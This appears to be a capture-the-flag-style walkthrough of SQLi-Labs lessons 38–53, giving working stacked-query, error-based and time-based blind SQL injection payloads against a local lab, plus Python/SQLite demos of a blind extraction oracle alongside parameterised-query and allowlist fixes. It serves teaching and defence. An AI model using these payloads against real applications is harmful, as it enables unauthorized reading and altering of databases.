SQLi-Labs page 3 (stacked injection) walkthrough: Less38~53

Stacked injection (stacked queries) is, as the name says, a stack of SQL statements (more than one) executed in a single call. The attacker ends the intended statement with a semicolon and appends statements of their own; unlike UNION or blind techniques these are not limited to SELECT, so INSERT, UPDATE, DELETE and DDL such as CREATE TABLE all work. The precondition is that the application runs the string through a multi-statement API such as mysqli_multi_query(); a single-statement call like mysqli_query() rejects the second statement.

For the background, read first: SQL stacked injection (stacked queries): principles and worked examples

 

Less38

GET - Stacked query injection - String

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
/* execute multi query */
if (mysqli_multi_query($con1, $sql))

 

mysqli_multi_query(): executes one or more semicolon-separated statements against the database in a single call. This is what makes the lesson stacked; with mysqli_query() the same $sql would fail on the second statement.

 

Injection example:

http://192.168.1.104/sqli-labs/Less-38/?id=1';insert into users(username,password) values('less38','less38') -- +

The 1' closes the string literal, ; ends the SELECT, and the trailing + decodes to the space that MySQL's -- comment requires, so the rest of the original statement (' LIMIT 0,1) is ignored. The page only renders the SELECT result; confirm the INSERT ran by requesting the new row's id afterwards.
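To see that it is the execution API, not the query text, that makes stacking possible, here is an added Python/SQLite example (not from the lab and not this page's own code). SQLite's executescript() plays the role of mysqli_multi_query(), execute() the role of mysqli_query(), and a bound parameter shows the real fix. The users table and its two rows are constructed for the demo, and the comment is written as "-- " because that is what the lab's "-- +" decodes to.

```python
import sqlite3

# Constructed stand-in for the lab's users table (not the lab's own schema or data).
def fresh_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO users(username, password) VALUES ('Dumb', 'Dumb'), ('Angelina', 'I-kill-you');
    """)
    return con

def build_query(id_param):
    # The Less38 pattern: the parameter is concatenated straight into the SQL text.
    return f"SELECT * FROM users WHERE id='{id_param}' LIMIT 0,1"

def user_count(con):
    return con.execute("SELECT COUNT(*) FROM users").fetchone()[0]

def query_multi(con, id_param):
    """Multi-statement execution, like mysqli_multi_query(): every statement in
    the string runs, so the injected INSERT lands in the table."""
    con.executescript(build_query(id_param))
    return user_count(con)

def query_single(con, id_param):
    """Single-statement execution, like mysqli_query(): the driver refuses the
    text as soon as it sees a second statement after the first semicolon."""
    try:
        con.execute(build_query(id_param))
        return "executed"
    except (sqlite3.ProgrammingError, sqlite3.Warning):
        return "rejected"

def query_param(con, id_param):
    """Parameterised query: the payload is bound as data, never parsed as SQL,
    so it simply matches no row and nothing else happens."""
    rows = con.execute("SELECT * FROM users WHERE id=? LIMIT 0,1", (id_param,)).fetchall()
    return len(rows)

# The Less38 payload as it arrives after URL decoding ("-- +" becomes "-- ").
PAYLOAD = "1';insert into users(username,password) values('less38','less38') -- "

if __name__ == "__main__":
    print("multi-statement API :", query_multi(fresh_db(), PAYLOAD), "rows (started with 2)")
    print("single-statement API:", query_single(fresh_db(), PAYLOAD))
    print("bound parameter     :", query_param(fresh_db(), PAYLOAD), "rows matched")
```

The same payload gives three different outcomes depending only on how the string is executed; that is why "escape the quote" is the wrong lesson to draw from this page and "never run request data through a multi-statement API" is the right one.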

 

Less39

GET - Stacked query injection - Integer based

$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
/* execute multi query */
if (mysqli_multi_query($con1, $sql))

 

Injection example (no quote to close, so the semicolon follows the number directly):

http://192.168.1.104/sqli-labs/Less-39/?id=1;insert into users(username,password) values('less39','less39') -- +

 

Heads-up for the two blind lessons that follow (Less40 and Less41): SQL errors are not echoed, so a broken payload and a successful one look the same in the browser. Verify the stacked statement by querying for the row it inserted.

 

Less40

GET - Blind based - Stacked (string, wrapped in parentheses)

$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
/* execute multi query */
if (mysqli_multi_query($con1, $sql))

 

Injection example (close the quote and the parenthesis, then stack):

http://192.168.1.104/sqli-labs/Less-40/?id=1');insert into users(username,password) values('less40','less40') -- +

 

Less41

GET - Blind based - Integer - Stacked

$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
/* execute multi query */
if (mysqli_multi_query($con1, $sql))

 

Injection example:

http://192.168.1.104/sqli-labs/Less-41/?id=1;insert into users(username,password) values('less41','less41') -- +

 

Less42

POST - Error based - String - Stacked

 

Analysis:

Data that has been through mysqli_real_escape_string() is stored unchanged; the escaping only has an effect at the moment the SELECT is assembled. So, unlike the earlier second-order injection lesson, the password-change page is not the way in here. The login form is. Look at the login.php source:

$username = mysqli_real_escape_string($con1, $_POST["login_user"]);
$password = $_POST["login_password"];
$sql = "SELECT * FROM users WHERE username='$username' and password='$password'";

if (@mysqli_multi_query($con1, $sql))

Only the username is escaped. The password is dropped into the query exactly as POSTed, and the string is run with mysqli_multi_query(), so the password field is the injection point. Because the query is stacked, the username does not even need to exist: the appended statement runs whether or not the SELECT matches a row. The @ suppresses PHP warnings, so a syntax error in the payload gives no feedback.

Username: anything;

Password: the injection payload.

 

Injection example:

Capture the login POST in BurpSuite and replace the password field:
login_user=admin&login_password=c';create table less42 like users#&mysubmit=Login

The c' closes the password literal, ; ends the SELECT, and # comments out the trailing quote. The login itself fails (no user has that password), so confirm success by checking for the new table less42 in the database.
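The point of Less42 is that escaping one input says nothing about the other. The following added Python/SQLite example (not from the lab and not this page's own code) reproduces login.php's asymmetry and runs the same payload through each field. Two substitutions are made because the demo runs on SQLite: quotes are escaped by doubling (SQLite's dialect) rather than with mysqli_real_escape_string()'s backslashes, and "create table ... like users" / "#" become "create table ... as select * from users" / "-- ". The users rows are constructed for the demo.

```python
import sqlite3

# Constructed stand-in for the lab's users table (not the lab's own data).
def fresh_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO users(username, password) VALUES ('admin', 'admin'), ('Dumb', 'Dumb');
    """)
    return con

def escape_string(s):
    """Quote escaping in SQLite's dialect (a quote is doubled). It stands in for
    mysqli_real_escape_string(), which uses backslashes for MySQL; the lesson
    is identical: it only protects the value it is actually applied to."""
    return s.replace("'", "''")

def login(con, login_user, login_password):
    """login.php's asymmetry: username escaped, password raw, and the whole
    string executed as a script, like mysqli_multi_query()."""
    username = escape_string(login_user)
    password = login_password
    sql = f"SELECT * FROM users WHERE username='{username}' and password='{password}'"
    con.executescript(sql)
    return sql

def table_exists(con, name):
    row = con.execute("SELECT 1 FROM sqlite_master WHERE type='table' AND name=?", (name,)).fetchone()
    return row is not None

# The Less42 payload, adapted to SQLite syntax as described in the lead-in.
PAYLOAD = "c';create table less42 as select * from users -- "

def attack_via_username(con):
    """Payload in the escaped field: the quote is doubled, everything stays
    inside the string literal, and no second statement exists."""
    login(con, PAYLOAD, "x")
    return table_exists(con, "less42")

def attack_via_password(con):
    """Same payload in the raw field: it ends the SELECT and CREATE TABLE runs."""
    login(con, "admin", PAYLOAD)
    return table_exists(con, "less42")

if __name__ == "__main__":
    print("via username:", attack_via_username(fresh_db()))  # escaped, harmless
    print("via password:", attack_via_password(fresh_db()))  # raw, table created
```

When auditing code like this, list every variable that reaches the query string and check each one's path separately; one escaped input next to one raw input is exactly the pattern that slips through a quick read.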

 

Less-43

POST - Blind based - String - Stacked, with parentheses

 $username = mysqli_real_escape_string($con1, $_POST["login_user"]);
 $password = $_POST["login_password"];

 $sql = "SELECT * FROM users WHERE username=('$username') and password=('$password')";

if (@mysqli_multi_query($con1, $sql))

 

Injection example:

BurpSuite capture, password field:
login_user=admin&login_password=c');create table less43 like users#&mysubmit=Login

The only change from Less42 is the closing parenthesis before the semicolon, matching password=('$password') in the query.

 

Less-44

POST - Error based - String - Stacked - Blind

 $username = mysqli_real_escape_string($con1, $_POST["login_user"]);
 $password = $_POST["login_password"];

 $sql = "SELECT * FROM users WHERE username='$username' and password='$password'";
  
 if (@mysqli_multi_query($con1, $sql))

 

Injection example:

BurpSuite capture, password field:
login_user=admin&login_password=c';insert into users(username,password) values ('less44','less44')#&mysubmit=Login

Same structure as Less42, but this lesson is blind: the response says nothing about whether the INSERT ran. Confirm it by logging in with less44 / less44 afterwards.

 

Less-45

POST - Error based - String - Stacked - Blind, with parentheses

$username = mysqli_real_escape_string($con1, $_POST["login_user"]);
$password = $_POST["login_password"];

$sql = "SELECT * FROM users WHERE username=('$username') and password=('$password')";

if (@mysqli_multi_query($con1, $sql))

 

Injection example:

BurpSuite capture, password field:
login_user=admin&login_password=c');insert into users(username,password) values ('less45','less45')#&mysubmit=Login

As in Less43, the parenthesis is closed before the semicolon; confirm by logging in with less45 / less45.

 

Less-46

GET - Error based - Numeric - ORDER BY clause

$sql = "SELECT * FROM users ORDER BY $id";

 

Injection approaches. The parameter lands after ORDER BY with no quotes, where MySQL evaluates it as an expression for every row, so the payload is written as a bare expression:

① A subquery in its own parentheses: ?sort=(select ...)

② A function whose argument carries the payload, e.g. rand(): ?sort=rand(<expression>)

③ An and: ?sort=1 and (<expression>)

 

Injection examples:

http://192.168.1.104/sqli-labs/Less-46/?sort=1 desc   the order reverses, which shows the parameter reaches ORDER BY unquoted
http://192.168.1.104/sqli-labs/Less-46/?sort=left(version(),1)  no error: the function is evaluated, but it yields a constant string (for example '5'), and a constant string after ORDER BY is not a column position, so the order does not change
Error based:
http://192.168.1.104/sqli-labs/Less-46/?sort=extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+
(the XPath error shows only the first 32 characters of the value; wrap the inner query in substr() to page through longer results)
Blind: time delay
http://192.168.1.104/sqli-labs/Less-46/?sort=(SELECT IF(SUBSTRING(current,1,1)=CHAR(115),BENCHMARK(50000000,md5('1')),null) FROM (select database() as current) as tb1)
http://192.168.1.104/sqli-labs/Less-46/?sort=1 and If(ascii(substr(database(),1,1))=116,0,sleep(5))
(note the inverted logic in the second one: it sleeps when the guess is wrong. ORDER BY evaluates its key once per row, so sleep() and benchmark() fire once per row of users; keep the delay small and time an unmodified request first)
Blind: the row order as the oracle
http://192.168.1.104/sqli-labs/Less-46/?sort=rand(ascii(left(database(),1))=115)
(the comparison is 0 or 1 and becomes the seed of rand(); a seeded rand() gives a fixed order that differs between seed 0 and seed 1, so which row comes first leaks one bit per request)
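All three approaches above (and the blind variants in Less48 and Less49) rest on one fact: whatever follows ORDER BY is evaluated as an expression and the resulting order is visible. The following added Python/SQLite example (not from the lab and not this page's own code) turns that into a boolean oracle, extracts a username one bit per request by binary search instead of the one-guess-per-request ascii(...)=N payloads above, and then shows the fix that actually holds, an allowlist of sort keys. Because the demo runs on SQLite, the MySQL-only functions in the URLs (rand(seed), if(), sleep(), benchmark()) are replaced with a CASE expression; the users rows are constructed for the demo.

```python
import sqlite3

# Constructed stand-in for the lab's users table (not the lab's own data).
def fresh_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO users(username, password) VALUES
            ('Dumb', 'Dumb'), ('Angelina', 'I-kill-you'), ('Dummy', 'p@ssword');
    """)
    return con

def vulnerable_sort(con, sort):
    """The Less46 pattern: the sort parameter is pasted straight after ORDER BY."""
    return con.execute(f"SELECT id, username FROM users ORDER BY {sort}").fetchall()

def oracle(con, condition):
    """One bit per request: when the condition holds the key is id (row 1 comes
    first), otherwise -id (the last row comes first). This is what rand(0) versus
    rand(1) or sleep-versus-no-sleep gives you in MySQL."""
    rows = vulnerable_sort(con, f"(CASE WHEN {condition} THEN id ELSE -id END)")
    return rows[0][0] == 1

def extract(con, subquery, max_len=32):
    """Binary-search each character code of the subquery's scalar result;
    about seven requests per character instead of up to 95."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            # Past the end of the string substr() is '' and unicode('') is NULL;
            # coalesce(..., 0) makes every comparison false so the search lands on 0.
            if oracle(con, f"coalesce(unicode(substr(({subquery}),{pos},1)),0) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        out += chr(lo)
    return out

# Defence: a column name cannot be a bind parameter, so map the user-supplied
# key onto a fixed allowlist and reject anything that is not in it.
ALLOWED_SORT = {"id": "id", "username": "username"}

def safe_sort(con, key, descending=False):
    column = ALLOWED_SORT.get(key)
    if column is None:
        raise ValueError(f"unsupported sort key: {key!r}")
    direction = "DESC" if descending else "ASC"
    return con.execute(f"SELECT id, username FROM users ORDER BY {column} {direction}").fetchall()

if __name__ == "__main__":
    con = fresh_db()
    print(extract(con, "SELECT username FROM users WHERE id=1"))
    print(safe_sort(con, "username"))
```

The extract() loop is the same thing the rand()/sleep() URLs do by hand, which is why an ORDER BY injection should be treated as full read access even when the page shows no error and no data. Escaping is useless here because nothing is quoted; only the allowlist in safe_sort() closes it.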

 

Less-47

GET - Error based - String - ORDER BY clause

$sql = "SELECT * FROM users ORDER BY '$id'";

 

Injection examples (the query is ORDER BY '$id', so the quote is closed first):

Error based
http://192.168.1.104/sqli-labs/Less-47?sort=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+
http://192.168.1.104/sqli-labs/Less-47?sort=1'and (select * from%20(select NAME_CONST(version(),1),NAME_CONST(version(),1))x)--+
(two columns with the same name, built with NAME_CONST(), raise a duplicate-column error that carries the value; NAME_CONST() only accepts constant arguments, so whether version() is tolerated depends on the MySQL version)
http://192.168.1.104/sqli-labs/Less-47/?sort=1' and (select count(*) from information_schema.columns group by concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()*2))) -- +
(the floor(rand()*2) duplicate-key trick is probabilistic; repeat the request if it comes back without an error)

 

Less-48

GET - Error based - Blind - Integer - ORDER BY clause

$sql = "SELECT * FROM users ORDER BY $id";

 

Injection examples (no errors are shown in this lesson, so the row order or the response time is the only signal):

http://192.168.1.104/sqli-labs/Less-48/?sort=rand(ascii(left(database(),1))=178)
http://192.168.1.104/sqli-labs/Less-48/?sort=rand(ascii(left(database(),1))=115)
(compare the two responses: 178 is a wrong guess and 115 ('s') the right one, and the order of the rows differs between them)
http://192.168.1.104/sqli-labs/Less-48/?sort=1 and (If(ascii(substr(database(),1,1))=115,0,sleep(5)))
(returns at once for a correct guess and sleeps for a wrong one; as in Less46 the sleep runs once per row, so keep it short)

 

Less-49

GET - Error based - Blind - String - ORDER BY clause

$sql = "SELECT * FROM users ORDER BY '$id'";

 

Injection example (same time-based approach as Less48, with the quote closed first):

http://192.168.1.104/sqli-labs/Less-49/?sort=1' and (If(ascii(substr((select username from users where id=1),1,1))=69,0,sleep(5))) --+
(because of the if(...,0,sleep(5)) order a correct guess returns immediately and a wrong one sleeps; step through the character codes until the delay disappears)

 

Less-50

GET - Error based - ORDER BY clause - Integer - Stacked

$sql="SELECT * FROM users ORDER BY $id";
/* execute multi query */
if (mysqli_multi_query($con1, $sql))

 

Injection example (numeric sort key, so the semicolon follows it directly):

http://192.168.1.104/sqli-labs/Less-50/?sort=1;create table less50 like users -- +

 

Less-51

GET - Error based - ORDER BY clause - String - Stacked

$sql="SELECT * FROM users ORDER BY '$id'";
/* execute multi query */
if (mysqli_multi_query($con1, $sql)) 

 

Injection example (the quote is closed before the semicolon, and the comment hides the trailing quote):

http://192.168.1.104/sqli-labs/Less-51/?sort=1';create table less51 like users -- +

 

Less-52

GET - Blind based - ORDER BY clause - Integer - Stacked

$sql="SELECT * FROM users ORDER BY $id";
/* execute multi query */
if (mysqli_multi_query($con1, $sql))

 

Injection example (blind, so verify the new table from the database side; the page reveals nothing):

http://192.168.1.104/sqli-labs/Less-52/?sort=1;create table less52 like users -- +

 

Less-53

GET - Blind based - ORDER BY clause - String - Stacked

$sql="SELECT * FROM users ORDER BY '$id'";
/* execute multi query */
if (mysqli_multi_query($con1, $sql)) 

 

Injection example (blind and string: close the quote, then stack, and verify from the database side):

http://192.168.1.104/sqli-labs/Less-53/?sort=1';create table less53 like users -- +
付杰